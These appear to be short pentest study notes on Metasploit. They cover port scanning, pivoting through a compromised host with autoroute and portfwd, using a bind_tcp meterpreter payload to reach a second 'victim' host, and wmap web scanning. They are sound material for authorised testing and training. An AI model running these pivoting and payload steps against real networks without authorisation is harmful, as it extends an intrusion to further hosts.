Host & Network pentest (MSF)

Scanning other hosts on the network from a machine we already have a session on

  • scan ports

use auxiliary/scanner/portscan/tcp

ip route
# run on the compromised host: lists the networks it can reach, which gives the subnet to route through below

  • pivoting

  • to scan victim-2 on a different network we need a session on any host of that network

run autoroute -s $IP/subnet
# $IP/subnet is victim-1's internal network (from ip route), not the address we reached victim-1 on

background
# backgrounds the current meterpreter session; the route stays active

# use the tcp port scan module against the routed network
use auxiliary/scanner/portscan/tcp
set RHOSTS victim-2 #victim-2 address on the internal network

port forwarding

meterpreter> portfwd add -l <local_port> -p <remote_port> -r $IP
  • note: after a port forward/pivot always use a bind_tcp payload; victim-2 cannot connect back to us, so we connect to it through the route instead

msf > set payload <platform>/meterpreter/bind_tcp   # e.g. windows/meterpreter/bind_tcp

wmap

  • to scan a web app from msfconsole

load wmap

# add the site here
wmap_sites -a $IP

# set the target url
wmap_targets -t http://$IP/

# list registered sites
wmap_sites -l

# -t lists the modules that will be run; -e launches them
wmap_run -t
wmap_run -e
